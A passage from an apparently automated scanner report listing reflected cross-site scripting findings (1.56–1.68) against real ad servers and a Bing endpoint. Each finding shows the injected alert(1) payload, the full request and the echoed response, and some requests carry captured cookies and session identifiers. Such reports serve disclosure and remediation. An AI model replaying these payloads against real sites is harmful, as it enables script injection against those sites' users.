Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 14:23:30 GMT
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: policyref="http://ads.adsonar.com/w3c/p3p.xml", CP="NOI DSP LAW NID CURa ADMa DEVa TAIo PSAo PSDo OUR SAMa OTRa IND UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 2536


           <!DOCTYPE html PUBLIC "-//W3C//DTD html 4.01 transitional//EN">
           <html>
               <head>
                   <title>Ads by Quigo</title>
                   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
...[SNIP]...
</script>
                   
                   
                                           java.lang.NumberFormatException: For input string: "8797686c86c<script>alert(1)</script>03ede497a81"

   
                                                           </head>
...[SNIP]...

1.56. http://ads.adsonar.com/adserving/getAds.jsp [placementId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the placementId request parameter is copied into an HTML comment. The payload 842ea--><script>alert(1)</script>48d2a0518b4 was submitted in the placementId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1341369842ea--><script>alert(1)</script>48d2a0518b4&pid=879768&ps=-1&zw=320&zh=280&url=http%3A//www.thestreet.com/story/229c029d89d776ed%29%28sn%3D*/1/bankatlantic-teams-with-intuit-financial-services-to-launch-8220this-way-to-25k8221-turbotax-for-online-banking-sweepstakes.html&v=5&dct=Sorry%2C%20the%20page%20you%20requested%20could%20not%20be%20found&ref=http%3A//burp/show/16 HTTP/1.1
Host: ads.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.thestreet.com/story/229c029d89d776ed)(sn=*/1/bankatlantic-teams-with-intuit-financial-services-to-launch-8220this-way-to-25k8221-turbotax-for-online-banking-sweepstakes.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 14:23:21 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain
Content-Length: 3402


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <!-- java.lang.NumberFormatException: For input string: "1341369842ea--><script>alert(1)</script>48d2a0518b4" -->
...[SNIP]...

1.57. http://ads.adsonar.com/adserving/getAds.jsp [ps parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the ps request parameter is copied into an HTML comment. The payload 68d8c--><script>alert(1)</script>c52ad980c6e was submitted in the ps parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1341369&pid=879768&ps=-168d8c--><script>alert(1)</script>c52ad980c6e&zw=320&zh=280&url=http%3A//www.thestreet.com/story/229c029d89d776ed%29%28sn%3D*/1/bankatlantic-teams-with-intuit-financial-services-to-launch-8220this-way-to-25k8221-turbotax-for-online-banking-sweepstakes.html&v=5&dct=Sorry%2C%20the%20page%20you%20requested%20could%20not%20be%20found&ref=http%3A//burp/show/16 HTTP/1.1
Host: ads.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.thestreet.com/story/229c029d89d776ed)(sn=*/1/bankatlantic-teams-with-intuit-financial-services-to-launch-8220this-way-to-25k8221-turbotax-for-online-banking-sweepstakes.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 14:23:42 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain
Content-Length: 3841


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <!-- java.lang.NumberFormatException: For input string: "-168d8c--><script>alert(1)</script>c52ad980c6e" -->
   
...[SNIP]...

1.58. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.bluelithium.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dbeb5"-alert(1)-"cefe6b77701 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=iframe&ad_size=1x1&section=1678185&admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_dataprovider_id=11&admeld_callback=http://tag.admeld.com/pixel&dbeb5"-alert(1)-"cefe6b77701=1 HTTP/1.1
Host: ads.bluelithium.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/80/accuweather/728x90/accuweather_btf?t=1296754832540&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.accuweather.com%2Fus%2Fsatellite%2Fei%2Fus_%2Fsatellite.asp&refer=http%3A%2F%2Fburp%2Fshow%2F66
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 18:53:40 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Thu, 03 Feb 2011 18:53:40 GMT
Pragma: no-cache
Content-Length: 5050
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=
...[SNIP]...
ype = "iframe"; rm_url = "http://ads.bluelithium.com/imp?Z=1x1&admeld_callback=http%3a%2f%2ftag.admeld.com%2fpixel&admeld_dataprovider_id=11&admeld_user_id=6acccca4%2dd0e4%2d464e%2da824%2df67cb28d5556&dbeb5"-alert(1)-"cefe6b77701=1&s=1678185&_salt=3597926079";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Array();if(
...[SNIP]...

1.59. http://ads.roiserver.com/tag.jsp [h parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.roiserver.com
Path:   /tag.jsp

Issue detail

The value of the h request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 48655'%3balert(1)//ba986b9e810 was submitted in the h parameter. This input was echoed as 48655';alert(1)//ba986b9e810 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tag.jsp?pid=C8EFE2E&w=728&h=9048655'%3balert(1)//ba986b9e810 HTTP/1.1
Host: ads.roiserver.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/dart/?ag=True&css=banner&p=locm.sp&pos=1&t=1&sz=728x90&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
Content-Type: application/x-javascript
Content-Length: 381
Date: Thu, 03 Feb 2011 16:08:06 GMT
Connection: close


var myRand=parseInt(Math.random()*99999999);

var pUrl = "http://ads.roiserver.com/disp?pid=C8EFE2E&rand=" + myRand;

var strCreative=''
+ '<IFRAME SRC="'
+ pUrl
+ '" WIDTH="728" HEIGHT="9048655';alert(1)//ba986b9e810" MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#000000">
...[SNIP]...

1.60. http://ads.roiserver.com/tag.jsp [pid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.roiserver.com
Path:   /tag.jsp

Issue detail

The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9352f"%3balert(1)//887397266bd was submitted in the pid parameter. This input was echoed as 9352f";alert(1)//887397266bd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tag.jsp?pid=C8EFE2E9352f"%3balert(1)//887397266bd&w=728&h=90 HTTP/1.1
Host: ads.roiserver.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/dart/?ag=True&css=banner&p=locm.sp&pos=1&t=1&sz=728x90&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
Content-Type: application/x-javascript
Content-Length: 381
Date: Thu, 03 Feb 2011 16:07:49 GMT
Connection: close


var myRand=parseInt(Math.random()*99999999);

var pUrl = "http://ads.roiserver.com/disp?pid=C8EFE2E9352f";alert(1)//887397266bd&rand=" + myRand;

var strCreative=''
+ '<IFRAME SRC="'
+ pUrl
+ '" WIDTH="728" HEIGHT="90" MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#000000">
...[SNIP]...

1.61. http://ads.roiserver.com/tag.jsp [w parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.roiserver.com
Path:   /tag.jsp

Issue detail

The value of the w request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d76ed'%3balert(1)//7fc95e77677 was submitted in the w parameter. This input was echoed as d76ed';alert(1)//7fc95e77677 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tag.jsp?pid=C8EFE2E&w=728d76ed'%3balert(1)//7fc95e77677&h=90 HTTP/1.1
Host: ads.roiserver.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/dart/?ag=True&css=banner&p=locm.sp&pos=1&t=1&sz=728x90&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
Content-Type: application/x-javascript
Content-Length: 381
Date: Thu, 03 Feb 2011 16:07:54 GMT


var myRand=parseInt(Math.random()*99999999);

var pUrl = "http://ads.roiserver.com/disp?pid=C8EFE2E&rand=" + myRand;

var strCreative=''
+ '<IFRAME SRC="'
+ pUrl
+ '" WIDTH="728d76ed';alert(1)//7fc95e77677" HEIGHT="90" MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#000000">
...[SNIP]...

1.62. http://ads.specificmedia.com/serve/v=5 [m parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.specificmedia.com
Path:   /serve/v=5

Issue detail

The value of the m request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e9934'-alert(1)-'9b44b809a0d was submitted in the m parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /serve/v=5;m=2;l=10980;cxt=99061898:2148402-10000150:2148402;kw=;ts=62446;smuid=uosDj9Liw_xRTA;p=ui%3DuosDj9Liw_xRTA%3Btr%3DzB_hgTzzd8E%3Btm%3D0-0e9934'-alert(1)-'9b44b809a0d HTTP/1.1
Host: ads.specificmedia.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/80/accuweather/300x250/accuweather_btf?t=1296754789156&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.accuweather.com%2Fus%2Fsatellite%2Fei%2Fus_%2Fsatellite.asp&refer=http%3A%2F%2Fburp%2Fshow%2F65
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: smt=eJxjZWdmYGBgZGECksxcXIZGlqaWBsZGBkbIbI5GoCyLkamZBQBmCQWm; smu=5035.928757113086138685

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 18:53:37 GMT
Server: Apache/2.2.15 (Unix) DAV/2 mod_perl/2.0.4 Perl/v5.10.0
Set-cookie: smu=5066.928757113086138685; domain=.specificmedia.com; path=/; expires=Fri, 08-Jan-2016 18:53:37 GMT
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI NAV"
Content-Length: 370
Expires: Wed, 02 Feb 2011 18:53:37 GMT
Cache-Control: no-cache,must-revalidate
Pragma: no-cache
Connection: close
Content-Type: application/x-javascript

document.write('<iframe src="http://ads.specificmedia.com/serve/v=5;m=3;l=10980;c=132574;b=786159;ts=20110203135337;p=ui%3DuosDj9Liw_xRTA%3Btr%3DzB_hgTzzd8E%3Btm%3D0-0e9934'-alert(1)-'9b44b809a0d;cxt=99061898:2148402-10000150:2148402" width="300" height="250" border="0" frameborder="0" marginwidth="0" marginheight="0" hspace="0" vspace="0" scrolling="NO">
...[SNIP]...

1.63. http://ads.specificmedia.com/serve/v=5 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.specificmedia.com
Path:   /serve/v=5

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 15f9d'-alert(1)-'2c3bcbaf79d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /serve/v=5;m=2;l=10980;cxt=99061898:2148402-10000150:2148402;kw=;ts=62446;smuid=uosDj9Liw_xRTA;p=ui%3DuosDj9Liw_xRTA%3Btr%3DzB_hgTzzd8E%3Btm%3D0-0&15f9d'-alert(1)-'2c3bcbaf79d=1 HTTP/1.1
Host: ads.specificmedia.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/80/accuweather/300x250/accuweather_btf?t=1296754789156&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.accuweather.com%2Fus%2Fsatellite%2Fei%2Fus_%2Fsatellite.asp&refer=http%3A%2F%2Fburp%2Fshow%2F65
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: smt=eJxjZWdmYGBgZGECksxcXIZGlqaWBsZGBkbIbI5GoCyLkamZBQBmCQWm; smu=5035.928757113086138685

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 18:53:38 GMT
Server: Apache/2.2.15 (Unix) DAV/2 mod_perl/2.0.4 Perl/v5.10.0
Set-cookie: smu=5066.928757113086138685; domain=.specificmedia.com; path=/; expires=Fri, 08-Jan-2016 18:53:38 GMT
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI NAV"
Content-Length: 373
Expires: Wed, 02 Feb 2011 18:53:38 GMT
Cache-Control: no-cache,must-revalidate
Pragma: no-cache
Connection: close
Content-Type: application/x-javascript

document.write('<iframe src="http://ads.specificmedia.com/serve/v=5;m=3;l=10980;c=132574;b=786159;ts=20110203135338;p=ui%3DuosDj9Liw_xRTA%3Btr%3DzB_hgTzzd8E%3Btm%3D0-0&15f9d'-alert(1)-'2c3bcbaf79d=1;cxt=99061898:2148402-10000150:2148402" width="300" height="250" border="0" frameborder="0" marginwidth="0" marginheight="0" hspace="0" vspace="0" scrolling="NO">
...[SNIP]...

1.64. http://adserving.cpxinteractive.com/st [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserving.cpxinteractive.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fa4b7"-alert(1)-"af13f1e484 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=pop&ad_size=0x0&section=1421534&banned_pop_types=28&pop_times=1&pop_frequency=86400&fa4b7"-alert(1)-"af13f1e484=1 HTTP/1.1
Host: adserving.cpxinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/dart/?ag=True&p=locm.pp&pos=7&t=7&sz=310x101&ord=1296748882748&k=banks&l=Dallas%2c+TX
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:03:28 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Thu, 03 Feb 2011 16:03:28 GMT
Pragma: no-cache
Content-Length: 4400
Age: 0
Proxy-Connection: close

/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_pop_frequency = 86400; rm_pop_times = 1; rm_pop_id = 1421534; rm_tag_type = "pop"; rm_url = "http://adserving.cpxinteractive.com/imp?Z=0x0&y=28&fa4b7"-alert(1)-"af13f1e484=1&s=1421534&_salt=3329141379";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Array();if(
...[SNIP]...

1.65. http://./qsonhs.aspx [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://.
Path:   /qsonhs.aspx

Issue detail

The value of the q request parameter is copied into the HTML document as plain text between tags. The payload d1d97<img%20src%3da%20onerror%3dalert(1)>37234bbbf48 was submitted in the q parameter. This input was echoed as d1d97<img src=a onerror=alert(1)>37234bbbf48 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /qsonhs.aspx?FORM=ASAPIW&q=d1d97<img%20src%3da%20onerror%3dalert(1)>37234bbbf48 HTTP/1.1
Host: .
Proxy-Connection: keep-alive
Referer: http://www.bing.com/search?q=online+banking&go=&form=QBLH&qs=n&sk=&sc=8-10
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _UR=OMW=0; _FP=; _HOP=; _SS=SID=4AF6A5397FEE47FCA6FD1F4826BF803F&bIm=338; SRCHD=MS=1626581&SM=1&D=1593447&AF=NOFORM; RMS=F=G; MUID=DC63BAA44C3843F38378B4BB213E0A6F

Response

HTTP/1.1 200 OK
Content-Length: 79
Content-Type: application/json; charset=utf-8
X-Akamai-TestID: 2284389bc6f9439a8eeedd3f98885c17
Date: Thu, 03 Feb 2011 13:42:59 GMT
Connection: close

{"AS":{"Query":"d1d97<img src=a onerror=alert(1)>37234bbbf48","FullResults":1}}

1.66. http://as00.estara.com/as/InitiateCall2.php [template parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://as00.estara.com
Path:   /as/InitiateCall2.php

Issue detail

The value of the template request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d35cb'%3balert(1)//c971cafb721 was submitted in the template parameter. This input was echoed as d35cb';alert(1)//c971cafb721 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /as/InitiateCall2.php?accountid=200106286435&template=655713d35cb'%3balert(1)//c971cafb721&checklinkstatus=1 HTTP/1.1
Host: as00.estara.com
Proxy-Connection: keep-alive
Referer: http://www201.americanexpress.com/business-credit-cards/business-credit-cards?source=footer_small_business_credit_cards3cde0%22%3balert(1)//2536ed24016
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fs_nocache_guid=0DC1EAC72231C3B51F226785010C6827; fscookies=b64_VcxBDsIwDATA3.QGSozt2Ie8BQWIVA4NiIb-E6Vqa3xbzXrB..AZhPFCKYByRAikLt9aWRoYvX5yfdTvnBjPvYHkt2NxvUin6dmWFBxj3-kPr3epe5hzu09loEY9miNsTRWzMcIuke0PW0EraIWskJVoJR4iYtZGWOUH

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 14:12:10 GMT
Server: Apache
P3P: CP="NON DSP COR CUR OUR LEG PHY COM", policyref="http://as00.estara.com/w3c/p3p.xml"
Expires: Wed, 11 Nov 1998 11:11:11 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Connection: close
Content-Type: application/x-javascript
Content-Length: 10152


var wv_available = true;
if (typeof(wv_available_vars) == 'undefined')
wv_available_vars = new Array();
wv_available_vars['655713d35cb';alert(1)//c971cafb721'] = true;

var wv_vars=typeof(wv_vars)=="undefined"?new Array():wv_vars;wv_vars["ui_width"]="430";wv_vars["ui_height"]="378";wv_vars["ui_version"]="UI0001";wv_vars["ui_newwindow"]="yes";wv_vars["ui_ac
...[SNIP]...

1.67. http://as00.estara.com/as/commonlink.php [urid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://as00.estara.com
Path:   /as/commonlink.php

Issue detail

The value of the urid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b46c6"%3balert(1)//6377ce7bc77 was submitted in the urid parameter. This input was echoed as b46c6";alert(1)//6377ce7bc77 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /as/commonlink.php?accountid=200106286435&template=253566&urid=69799b46c6"%3balert(1)//6377ce7bc77&estara_fsguid=0DC1EAC72231C3B51F226785010C6827&host=as00.estara.com&fromrules=1&dnc=1296742159.25144911407943 HTTP/1.1
Host: as00.estara.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fscookies=b64_VcxNDsIgEAXg27CrgWF.YMFZDCpJGy0ai-e3IbYdZ-fyvXlgrbMMgdFTchBZEMAGky.tLA2Unt.53upnTownRxHJbsfBrEUaxqktyRvGdec-PF.l7mHO7TqWjlHi0exha8agNnrYRVj-sBbUglpIC2kRLXJICGqth588pnofmEicT-AF; fsserver__SESSION____SECURE__=c-7301.estara.com; fsserver__SESSION__=c-7301.estara.com; fs_nocache_guid=0DC1EAC72231C3B51F226785010C6827;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 14:15:59 GMT
Server: Apache
P3P: CP="NON DSP COR CUR OUR LEG PHY COM", policyref="http://as00.estara.com/w3c/p3p.xml"
Expires: Wed, 11 Nov 1998 11:11:11 GMT
Last-Modified: Thu, 03 Feb 2011 14:15:59 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: fscookies=b64_lY9BDoMgEEVPgzsbGGAGFm666DUatSSaKjaK9y.xVafLEjYv7-8fACmVRHBotK0UeCQDIF1RNyksCZi9z3V8xHWs0FyU9cbK-aArctCWXZ.WShdo8s4vTK8QDxjr1HZhk578mdxgT3rHNjY4DCHvIDeGG8ON5cZyQ9zQaZxjaxt8zdDHZ4nWktIVfJ7dGGxRAAh9rYcwJwFOCfACbvmiJmoDNS3R8Xf1Z69ZU5pi7r0B; expires=Tue, 02-Feb-2016 14:15:59 GMT; path=/UI/; domain=.estara.com
Connection: close
Content-Type: application/x-javascript
Content-Length: 34262

var wv_vars=typeof(wv_vars)=="undefined"?new Array():wv_vars;wv_vars["ui_width"]="430";wv_vars["ui_height"]="378";wv_vars["ui_version"]="UI0001";wv_vars["ui_newwindow"]="yes";wv_vars["ui_accountid"]="
...[SNIP]...
meoutdefault_template"] = "253566";
wv_vars["timeout253566_state"] = "on";
wv_vars["timeout253566_template"] = "253566";
wv_vars["timeout253566_urid"] = "69799b46c6";alert(1)//6377ce7bc77";
wv_vars["timeout253566_timeoutms"] = "0";
wv_vars["timeout253566_closems"] = "0";
wv_vars["timeout253566_resetmouse"] = "false";
wv_vars["timeout253566_resetkeyboard"] = "false";
wv_var
...[SNIP]...

1.68. http://as00.estara.com/as/commonlink.php [urid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://as00.estara.com
Path:   /as/commonlink.php

Issue detail

The value of the urid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 62faa'%3balert(1)//57357bc1d12 was submitted in the urid parameter. This input was echoed as 62faa';alert(1)//57357bc1d12 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

